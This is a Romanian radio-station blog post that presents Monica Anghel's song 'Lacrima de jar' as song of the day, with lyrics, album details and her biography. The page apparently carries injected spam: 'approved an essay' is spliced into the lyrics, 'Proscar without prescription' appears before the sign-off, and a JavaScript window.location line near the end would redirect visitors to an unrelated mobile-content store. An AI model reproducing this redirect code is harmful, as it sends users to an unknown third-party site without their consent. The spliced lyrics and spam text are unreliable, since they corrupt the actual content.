Melodia zilei de 31 Ianuarie 2014

 

Monica Anghel – “Lacrima de jar”

“Lacrima de jar,
Nu ma face iar
Sa blestem ce am, ce n-am avut…
Lacrima de jar,
Ia tot ce-i amar,
Ia-mi din suflet tot ce m-a durut,
Sa ma linistesc si-apoi sa uit
approved an essay Ca te-am vrut, dar eu nu te-am avut…”

Albumul “Lacrimă de jar”, realizat cu OVO Music include 14 melodii, unele dintre ele piese folclorice vechi, printre care “Floare verde matostat”, “Piatră, piatră” şi “Pe uliţa armenească”, dar şi piese noi, compuse de Ionel Tudor şi Temistocle Popa. De asemenea, muzica pentru trei dintre piesele albumului este semnată de violonistul Aurel Ioniţă, fondatorul Mahala Rai Banda, care semnează, alături de Ionel Tudor, aranjamentele orchestrale. Prima colaborare dintre Monica Anghel şi Mahala Rai Banda, cunoscută melodie lăutărească “Chi bori” se regăseşte şi ea pe acest album.

Una dintre cele mai indragite intreprete din Romania, Monica Anghel considera că un un artist adevarat trebuie să aiba mereu un proiect nou.

lacrima-de-jar-album-inedit-monica-anghel-si-mahala-rai-banda-de-la-revista-felicia-71085

Monica Anghel este o cunoscută cântăreață, prezentatore de radio și actriță din România. Ea a câștigat Festivalului Internațional „Cerbul de aur”, ediția 1996 și a participant, ca reprezentantă a României, la concursul Eurovision (ediția din 1996 alături de formația Sincron și ediția din 2002 împreună cu Marcel Pavel). În prezent, activează în grupul de umor „Divertis”.

“Este un album superb pe care îl ador, are un parfum special şi mă bucur enorm că am reuşit să realizez acest minunat proiect pentru că nu a fost uşor”, a afirmat Monica Anghel.

O melodie frumoasa semnata de Monica Anghel – “Lacrima de jar”, este aleasa melodia zilei de 31 Ianuarie 2014 la Radio Enigma Romania.

O melodie superba pe care tu enigmatic/a… ai ales-o piesa zilei si pe care noi cei de la Radio Enigma Romania ti-o daruim cu mare drag si mereu cu acelasi mesaj: Simte, traieste si iubeste!

Haideti sa il ascultam si noi.

Proscar without prescription O zi frumoasa sa ai alaturi de cei dragi tie,
alaturi de Radio Enigma Romania -Vocea gandurilor tale.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *